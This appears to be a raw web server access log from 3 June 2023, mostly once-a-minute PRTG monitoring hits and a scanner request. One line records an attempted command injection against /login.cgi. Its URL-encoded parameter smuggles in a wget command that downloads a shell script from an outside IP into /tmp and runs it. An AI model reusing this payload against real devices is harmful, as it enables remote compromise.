212.91.246.72 - - [03/Jun/2023:07:26:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:27:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.38 - - [03/Jun/2023:07:27:29 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [03/Jun/2023:07:28:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.240 - - [03/Jun/2023:07:28:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [03/Jun/2023:07:29:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:30:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:31:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:33:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:34:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:35:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:36:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:37:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:38:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.165.16.72 - - [03/Jun/2023:07:38:14 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [03/Jun/2023:07:39:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [03/Jun/2023:07:40:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
